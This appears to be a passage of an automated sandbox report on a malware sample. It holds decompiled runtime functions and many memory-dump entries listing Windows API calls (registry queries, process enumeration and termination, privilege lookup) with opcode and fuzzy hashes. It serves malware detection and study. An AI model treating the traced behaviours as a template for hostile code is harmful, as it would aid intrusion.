                                                                                                              • Opcode Fuzzy Hash: e991542edace0fb69bde6cd58c0a2e21ff2c9ea550540e07b765c3ff8093f681
                                                                                                              • Instruction Fuzzy Hash: 601170715003009FDB21CF99D944BA6FBE4EF05220F08846AED498B655E375E858CF71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 026BB9F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: InformationQuerySystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 3562636166-0
                                                                                                              • Opcode ID: 10fdd44d23f676fa57cd79f1768df4cd4f1bf21d9c8c979d506f90000e509b62
                                                                                                              • Instruction ID: a45aa6351d350563146731dd2d0c4d72381cea5b5e0799c4586bcb28596c939f
                                                                                                              • Opcode Fuzzy Hash: 10fdd44d23f676fa57cd79f1768df4cd4f1bf21d9c8c979d506f90000e509b62
                                                                                                              • Instruction Fuzzy Hash: 85019A72400344AFEB218F06DD84B62FFA8EF49724F08C45DEE894B211D371A858CB61
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: recv
                                                                                                              • String ID:
                                                                                                              • API String ID: 1507349165-0
                                                                                                              • Opcode ID: ce784629a4417805041fd37d625989b8fb0123d022037eec10991cc18ac478a8
                                                                                                              • Instruction ID: e4d0f58ed63548e57884c04301bd4b2a4eae3d5045e211de105604b8103aec77
                                                                                                              • Opcode Fuzzy Hash: ce784629a4417805041fd37d625989b8fb0123d022037eec10991cc18ac478a8
                                                                                                              • Instruction Fuzzy Hash: 64015E715043409FDB61CF5AD984B65FFA0EF04324F0884AADD494B655D375E458CB72
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 026BB9F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: InformationQuerySystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 3562636166-0
                                                                                                              • Opcode ID: a7c4b6fa9532e4815cbb85cb31c3047e00eedc8500cd64ea375a66497c74c5e6
                                                                                                              • Instruction ID: 50c7a677dd726e6017427df6b292867df0a00e59c4a73d16df1a97cd32d8a874
                                                                                                              • Opcode Fuzzy Hash: a7c4b6fa9532e4815cbb85cb31c3047e00eedc8500cd64ea375a66497c74c5e6
                                                                                                              • Instruction Fuzzy Hash: 29018B319003409FDB618F4AD884B61FFA0EF09324F08C49ADD494B616D375E458CB72
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 84%
                                                                                                              			E004018D0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                              				void* __ebx;
                                                                                                              				void* __ebp;
                                                                                                              				signed int _t12;
                                                                                                              				void* _t21;
                                                                                                              				int _t25;
                                                                                                              				void* _t30;
                                                                                                              				int _t32;
                                                                                                              				char* _t35;
                                                                                                              
                                                                                                              				_t21 = __edx;
                                                                                                              				_t35 = _a4;
                                                                                                              				_t17 = __ecx;
                                                                                                              				if(_t35 != 0) {
                                                                                                              					_t25 = lstrlenA(_t35) + 1;
                                                                                                              					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                              					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                              					asm("sbb esi, esi");
                                                                                                              					_t30 =  ~_t12 + 1;
                                                                                                              					if(_t30 != 0) {
                                                                                                              						_t12 = GetLastError();
                                                                                                              						if(_t12 == 0x7a) {
                                                                                                              							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                              							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                              							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                              							asm("sbb esi, esi");
                                                                                                              							_t30 =  ~_t12 + 1;
                                                                                                              						}
                                                                                                              						if(_t30 != 0) {
                                                                                                              							_t12 = E00401030();
                                                                                                              						}
                                                                                                              					}
                                                                                                              					return _t12;
                                                                                                              				} else {
                                                                                                              					 *__ecx = _t35;
                                                                                                              					return __eax;
                                                                                                              				}
                                                                                                              			}











                                                                                                              0x004018d0
                                                                                                              0x004018d2
                                                                                                              0x004018d6
                                                                                                              0x004018da
                                                                                                              0x004018f7
                                                                                                              0x004018fa
                                                                                                              0x0040190f
                                                                                                              0x00401919
                                                                                                              0x0040191b
                                                                                                              0x0040191e
                                                                                                              0x00401920
                                                                                                              0x00401929
                                                                                                              0x0040193e
                                                                                                              0x0040194b
                                                                                                              0x00401960
                                                                                                              0x0040196a
                                                                                                              0x0040196c
                                                                                                              0x0040196c
                                                                                                              0x0040196f
                                                                                                              0x00401971
                                                                                                              0x00401971
                                                                                                              0x0040196f
                                                                                                              0x0040197a
                                                                                                              0x004018dc
                                                                                                              0x004018dc
                                                                                                              0x004018e0
                                                                                                              0x004018e0

                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(?), ref: 004018E6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040190F
                                                                                                              • GetLastError.KERNEL32 ref: 00401920
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401938
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401960
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3322701435-0
                                                                                                              • Opcode ID: 8573e2c317d3cfbbe08dd234adf7fb2bf028b8f5a35bd758f9ba00c18020373e
                                                                                                              • Instruction ID: 479df52544d56d876bc77731e3856ebb8807a2cfa2341b2feafe69ca537890df
                                                                                                              • Opcode Fuzzy Hash: 8573e2c317d3cfbbe08dd234adf7fb2bf028b8f5a35bd758f9ba00c18020373e
                                                                                                              • Instruction Fuzzy Hash: 4C11B2766402247BD230A7558C88F677F6CEF86BA9F008169FD85AB291C635AC04C6B8
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 63%
                                                                                                              			E0040AF26(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                              				signed int _v4;
                                                                                                              				signed int _v16;
                                                                                                              				signed int _v40;
                                                                                                              				void* _t14;
                                                                                                              				signed int _t15;
                                                                                                              				intOrPtr* _t21;
                                                                                                              				signed int _t24;
                                                                                                              				void* _t28;
                                                                                                              				void* _t39;
                                                                                                              				void* _t40;
                                                                                                              				signed int _t42;
                                                                                                              				void* _t45;
                                                                                                              				void* _t47;
                                                                                                              				void* _t51;
                                                                                                              
                                                                                                              				_t40 = __edi;
                                                                                                              				_t28 = __ebx;
                                                                                                              				_t45 = _t51;
                                                                                                              				while(1) {
                                                                                                              					_t14 = E0040B80D(_t28, _t39, _t40, _a4); // executed
                                                                                                              					if(_t14 != 0) {
                                                                                                              						break;
                                                                                                              					}
                                                                                                              					_t15 = E0040D2A3(_a4);
                                                                                                              					__eflags = _t15;
                                                                                                              					if(_t15 == 0) {
                                                                                                              						__eflags =  *0x423490 & 0x00000001;
                                                                                                              						if(( *0x423490 & 0x00000001) == 0) {
                                                                                                              							 *0x423490 =  *0x423490 | 0x00000001;
                                                                                                              							__eflags =  *0x423490;
                                                                                                              							E0040AEBC(0x423484);
                                                                                                              							E0040D27D( *0x423490, 0x41a6c4);
                                                                                                              						}
                                                                                                              						E0040AF09( &_v16, 0x423484);
                                                                                                              						E0040CCF9( &_v16, 0x420fa4);
                                                                                                              						asm("int3");
                                                                                                              						_t47 = _t45;
                                                                                                              						_push(_t47);
                                                                                                              						_push(0xc);
                                                                                                              						_push(0x420ff8);
                                                                                                              						_t19 = E0040E198(_t28, _t40, 0x423484);
                                                                                                              						_t42 = _v4;
                                                                                                              						__eflags = _t42;
                                                                                                              						if(_t42 != 0) {
                                                                                                              							__eflags =  *0x4250b0 - 3;
                                                                                                              							if( *0x4250b0 != 3) {
                                                                                                              								_push(_t42);
                                                                                                              								goto L16;
                                                                                                              							} else {
                                                                                                              								E0040D6A0(_t28, 4);
                                                                                                              								_v16 = _v16 & 0x00000000;
                                                                                                              								_t24 = E0040D6D3(_t42);
                                                                                                              								_v40 = _t24;
                                                                                                              								__eflags = _t24;
                                                                                                              								if(_t24 != 0) {
                                                                                                              									_push(_t42);
                                                                                                              									_push(_t24);
                                                                                                              									E0040D703();
                                                                                                              								}
                                                                                                              								_v16 = 0xfffffffe;
                                                                                                              								_t19 = E0040B6CB();
                                                                                                              								__eflags = _v40;
                                                                                                              								if(_v40 == 0) {
                                                                                                              									_push(_v4);
                                                                                                              									L16:
                                                                                                              									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                              									if(__eflags == 0) {
                                                                                                              										_t21 = E0040BF81(__eflags);
                                                                                                              										 *_t21 = E0040BF3F(GetLastError());
                                                                                                              									}
                                                                                                              								}
                                                                                                              							}
                                                                                                              						}
                                                                                                              						return E0040E1DD(_t19);
                                                                                                              					} else {
                                                                                                              						continue;
                                                                                                              					}
                                                                                                              					L19:
                                                                                                              				}
                                                                                                              				return _t14;
                                                                                                              				goto L19;
                                                                                                              			}

















                                                                                                              0x0040af26
                                                                                                              0x0040af26
                                                                                                              0x0040af29
                                                                                                              0x0040af3d
                                                                                                              0x0040af40
                                                                                                              0x0040af48
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0040af33
                                                                                                              0x0040af39
                                                                                                              0x0040af3b
                                                                                                              0x0040af4c
                                                                                                              0x0040af58
                                                                                                              0x0040af5a
                                                                                                              0x0040af5a
                                                                                                              0x0040af63
                                                                                                              0x0040af6d
                                                                                                              0x0040af72
                                                                                                              0x0040af77
                                                                                                              0x0040af85
                                                                                                              0x0040af8a
                                                                                                              0x0040af90
                                                                                                              0x0040ae82
                                                                                                              0x0040b675
                                                                                                              0x0040b677
                                                                                                              0x0040b67c
                                                                                                              0x0040b681
                                                                                                              0x0040b684
                                                                                                              0x0040b686
                                                                                                              0x0040b688
                                                                                                              0x0040b68f
                                                                                                              0x0040b6d4
                                                                                                              0x00000000
                                                                                                              0x0040b691
                                                                                                              0x0040b693
                                                                                                              0x0040b699
                                                                                                              0x0040b69e
                                                                                                              0x0040b6a4
                                                                                                              0x0040b6a7
                                                                                                              0x0040b6a9
                                                                                                              0x0040b6ab
                                                                                                              0x0040b6ac
                                                                                                              0x0040b6ad
                                                                                                              0x0040b6b3
                                                                                                              0x0040b6b4
                                                                                                              0x0040b6bb
                                                                                                              0x0040b6c0
                                                                                                              0x0040b6c4
                                                                                                              0x0040b6c6
                                                                                                              0x0040b6d5
                                                                                                              0x0040b6e3
                                                                                                              0x0040b6e5
                                                                                                              0x0040b6e7
                                                                                                              0x0040b6fa
                                                                                                              0x0040b6fc
                                                                                                              0x0040b6e5
                                                                                                              0x0040b6c4
                                                                                                              0x0040b68f
                                                                                                              0x0040b702
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0040af3b
                                                                                                              0x0040af4b
                                                                                                              0x00000000

                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 0040AF40
                                                                                                                • Part of subcall function 0040B80D: __FF_MSGBANNER.LIBCMT ref: 0040B830
                                                                                                                • Part of subcall function 0040B80D: __NMSG_WRITE.LIBCMT ref: 0040B837
                                                                                                                • Part of subcall function 0040B80D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C46,00000001,00000001,00000001,?,0040D62A,00000018,00421240,0000000C,0040D6BB), ref: 0040B884
                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AF63
                                                                                                                • Part of subcall function 0040AEBC: std::exception::exception.LIBCMT ref: 0040AEC8
                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AF77
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040AF85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                              • String ID:
                                                                                                              • API String ID: 1411284514-0
                                                                                                              • Opcode ID: d30f8c44cb69d90f3fd87a0b0606e938fd9b4af3ccd9ae8c023a4b02cbe9f77d
                                                                                                              • Instruction ID: d0037a69dd8aa8fc1f7bd44e20a83df3c9345600b6565f77841dd3ec14470a5b
                                                                                                              • Opcode Fuzzy Hash: d30f8c44cb69d90f3fd87a0b0606e938fd9b4af3ccd9ae8c023a4b02cbe9f77d
                                                                                                              • Instruction Fuzzy Hash: CCF0E271A0430662CB14BB61EC0BD4A3B688F4031CB6000BFEC11750E2DF7CDA16959E
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E38), ref: 026BB6CD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: e8610c4fce2ced8f2d3f62f5e79d0c9ca901a3c3e540a8d785764b1c3fa12620
                                                                                                              • Instruction ID: 151474e03dae871a0149539ab5bb27564e569636dadbc90574bd822af0a5ac30
                                                                                                              • Opcode Fuzzy Hash: e8610c4fce2ced8f2d3f62f5e79d0c9ca901a3c3e540a8d785764b1c3fa12620
                                                                                                              • Instruction Fuzzy Hash: 043194B25097846FE7238B25CC45FA6BFB8EF06724F0884DBE9809B153D264E949C771
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BB7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3660427363-0
                                                                                                              • Opcode ID: f52aa5605e76d317bae4f7e291c2622372d631da73ee4890400f2c4e04c920ca
                                                                                                              • Instruction ID: ae19ae447b5acdefdab6eacdaef97914ad1866e995d948d7bd52845a4d6782c8
                                                                                                              • Opcode Fuzzy Hash: f52aa5605e76d317bae4f7e291c2622372d631da73ee4890400f2c4e04c920ca
                                                                                                              • Instruction Fuzzy Hash: 7A3191711097846FE722CF25CC84F92BFF8EF06324F1884AAE9858B253D364E549CB61
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32EnumProcessModules.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BACAA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: EnumModulesProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1082081703-0
                                                                                                              • Opcode ID: cbf8cdab1faa9c19cc4582895fd89b74d66d9cecd51cdc1f3d7df91de9649783
                                                                                                              • Instruction ID: 5f6f3311a479bf219f2d97a03c18fc6946d2d333036fecb57df0c7533c6ad598
                                                                                                              • Opcode Fuzzy Hash: cbf8cdab1faa9c19cc4582895fd89b74d66d9cecd51cdc1f3d7df91de9649783
                                                                                                              • Instruction Fuzzy Hash: 6121E6B2109380AFE7128F64DC45B96BFB8EF06320F08849AE984DB193D324D949C761
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32GetModuleInformation.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BAD9A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: InformationModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 3425974696-0
                                                                                                              • Opcode ID: 32bfee702a87e36135a323d38e4872cebce2781f6b9f1e4daa41d15ac5425ec0
                                                                                                              • Instruction ID: 3d70f59fcf7336ad87d8727db27a89a784efa40265f0b4afa96a2c1c7ba97fc2
                                                                                                              • Opcode Fuzzy Hash: 32bfee702a87e36135a323d38e4872cebce2781f6b9f1e4daa41d15ac5425ec0
                                                                                                              • Instruction Fuzzy Hash: 7721A8715093846FE722CF55DC44F96BFB8DF06210F0884AAE944DB152D764E948CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • TerminateProcess.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BBAB8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ProcessTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 560597551-0
                                                                                                              • Opcode ID: 7563eefea3b5add0b9ccc6ed532c120a817fecf64468da0776993737e4e41613
                                                                                                              • Instruction ID: 5f25e191d7ed73d1e3d48ebff4b117d2b25cfa01126536854d6622eab18cf2d9
                                                                                                              • Opcode Fuzzy Hash: 7563eefea3b5add0b9ccc6ed532c120a817fecf64468da0776993737e4e41613
                                                                                                              • Instruction Fuzzy Hash: 5F2195B15493846FE7138F25DC45F96BFB8EF46320F0884EBE984DF292D264A948C761
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNEL32(?,00000E38,?,?), ref: 026BBE12
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3660427363-0
                                                                                                              • Opcode ID: b714c62d550b709956881297d16bcc2794567cb6f2c355bde949b2a378d4eded
                                                                                                              • Instruction ID: 98b62e23b3d1919732153004dd3245ad0783ed1d3d6ec1b5cc4bdae135b77c46
                                                                                                              • Opcode Fuzzy Hash: b714c62d550b709956881297d16bcc2794567cb6f2c355bde949b2a378d4eded
                                                                                                              • Instruction Fuzzy Hash: 0B21D7755093C06FD3138B25DC51F62BFB4EF87A20F0981DBE9848B653D225A91AC7B2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindNextFileW.KERNEL32(?,00000E38,?,?), ref: 026BA23E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FileFindNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 2029273394-0
                                                                                                              • Opcode ID: bcc50c912664d2f8b8a87c57083aaf69b180e3223b3d91415e43942ca9ff1f7f
                                                                                                              • Instruction ID: 0fe528c0a33a373aa05214d554366698ae3013bb264e2e064bfcbf7f982f9cbc
                                                                                                              • Opcode Fuzzy Hash: bcc50c912664d2f8b8a87c57083aaf69b180e3223b3d91415e43942ca9ff1f7f
                                                                                                              • Instruction Fuzzy Hash: F821F27140D3C06FD3138B268C55B66BFB4EF47620F0981DBE984CF293D224A909C7A2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E38), ref: 026BB6CD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: 3537e68a320885add5c1543b189a00de84cebe04698709d8c790eb3dbcf793eb
                                                                                                              • Instruction ID: a58788b6475367859cba2afd444ada36c5e957a0dd4809697b4c37ecae583973
                                                                                                              • Opcode Fuzzy Hash: 3537e68a320885add5c1543b189a00de84cebe04698709d8c790eb3dbcf793eb
                                                                                                              • Instruction Fuzzy Hash: 6D21D1B2500704AFE7229F65DC85FAAFBECEF08324F14846AED419B641E724E549CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BB7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3660427363-0
                                                                                                              • Opcode ID: 628c529b3011de480064c96319a2faca1e1e501ee7dca7cb0ae96c105a2f7bdf
                                                                                                              • Instruction ID: 4054287b83cdbd0b8167e13f4dba596c33bf9bd1954b174c33470d41486c3aca
                                                                                                              • Opcode Fuzzy Hash: 628c529b3011de480064c96319a2faca1e1e501ee7dca7cb0ae96c105a2f7bdf
                                                                                                              • Instruction Fuzzy Hash: 7D219071600704AFE722CF16CC84FA6BBECEF04724F08846AED459B652D764E444CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindCloseChangeNotification.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BAADC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                              • String ID:
                                                                                                              • API String ID: 2591292051-0
                                                                                                              • Opcode ID: ac6b79f45ff7ffe60f696e8ac0492ba1fb993610cee825c34a793cbe48131c91
                                                                                                              • Instruction ID: e6eccb0e1daf442278d5cb864d6db87774010103fbf8f7060777bda393b960f0
                                                                                                              • Opcode Fuzzy Hash: ac6b79f45ff7ffe60f696e8ac0492ba1fb993610cee825c34a793cbe48131c91
                                                                                                              • Instruction Fuzzy Hash: D32181725093C05FDB138B25DD54792BFB4AF07224F0D84DAED858F663D2649948CB62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(?,00000E38), ref: 026BAF67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: 35beb5bd6a790246984128b05cde3b68f993cff315c75696aa78b398bbb4d8bc
                                                                                                              • Instruction ID: 764e6a3ede04eca1874eee211e98ea7df395e2c81a61cd373540f146c6be59e6
                                                                                                              • Opcode Fuzzy Hash: 35beb5bd6a790246984128b05cde3b68f993cff315c75696aa78b398bbb4d8bc
                                                                                                              • Instruction Fuzzy Hash: DE21D271508380AFE722CF15DD85FA6BFA8EF05320F18849AF9445B292D364E948C762
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32GetModuleInformation.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BAD9A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: InformationModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 3425974696-0
                                                                                                              • Opcode ID: d0e947e5ca34c5c510234bc798c7d16fc81299f80aa48bfe511283a69ee67c24
                                                                                                              • Instruction ID: 29f95285c0140990ed6a5dbce19e0c3962b7676e86158872bece10730ca77491
                                                                                                              • Opcode Fuzzy Hash: d0e947e5ca34c5c510234bc798c7d16fc81299f80aa48bfe511283a69ee67c24
                                                                                                              • Instruction Fuzzy Hash: 1311B4716003049FEB22CF55DC44FA6BBA8EF04320F04846AED45CB291D774E844CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • MkParseDisplayName.OLE32(?,00000E38,?,?), ref: 026BB8C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DisplayNameParse
                                                                                                              • String ID:
                                                                                                              • API String ID: 3580041360-0
                                                                                                              • Opcode ID: 7d22e257cb8e03dc58b186a334c14e5e77fd09e407998c849ae2bfca8f324645
                                                                                                              • Instruction ID: 551b838061267625203926301ca6409f05a4994c676a071564445efcdc4da280
                                                                                                              • Opcode Fuzzy Hash: 7d22e257cb8e03dc58b186a334c14e5e77fd09e407998c849ae2bfca8f324645
                                                                                                              • Instruction Fuzzy Hash: 7D21E7725093C06FC312CB26CC45F62BFB4EF87610F0981CBE9848B253D220E915C7A2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 026BA806
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3899507212-0
                                                                                                              • Opcode ID: a24e1bb304f060382db065a6a6622c760866163843a4101e23c94a14c8aafb1f
                                                                                                              • Instruction ID: a6fc074c76085c6d3963917c68097ed3f9c184c65906fac826dbdbe186f48471
                                                                                                              • Opcode Fuzzy Hash: a24e1bb304f060382db065a6a6622c760866163843a4101e23c94a14c8aafb1f
                                                                                                              • Instruction Fuzzy Hash: 672184715093809FDB22CF65DC54B52BFB8EF06210F0884AEED45CB652D335E844C761
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32EnumProcessModules.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BACAA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: EnumModulesProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1082081703-0
                                                                                                              • Opcode ID: 6fe6c850737359da060a497ba713e60d3b6836f9e798b152f9602fa3cf2fe96d
                                                                                                              • Instruction ID: 3e4aedfd4bce2cf8b4032ccdf1f7a793cd2b5753d89feeb1a8b810a6cde7b7c0
                                                                                                              • Opcode Fuzzy Hash: 6fe6c850737359da060a497ba713e60d3b6836f9e798b152f9602fa3cf2fe96d
                                                                                                              • Instruction Fuzzy Hash: 1611C4B1500304AFEB22CF59DD45BA6FBA8EF04320F04846AED45DB245E774E848CBB2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • TerminateProcess.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BBAB8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ProcessTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 560597551-0
                                                                                                              • Opcode ID: 2a6ef28dacbd1e48d030a582931a4195734ec55b2223f4d90201a584c307c02e
                                                                                                              • Instruction ID: 0da6c761ed8955ad2762e212a0ba9c51edf980685f2df53697685f956207540a
                                                                                                              • Opcode Fuzzy Hash: 2a6ef28dacbd1e48d030a582931a4195734ec55b2223f4d90201a584c307c02e
                                                                                                              • Instruction Fuzzy Hash: 0A11C6B1504304AFEB22CF19DD85BAABBACDF05320F04846AED45DB245E774E445CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
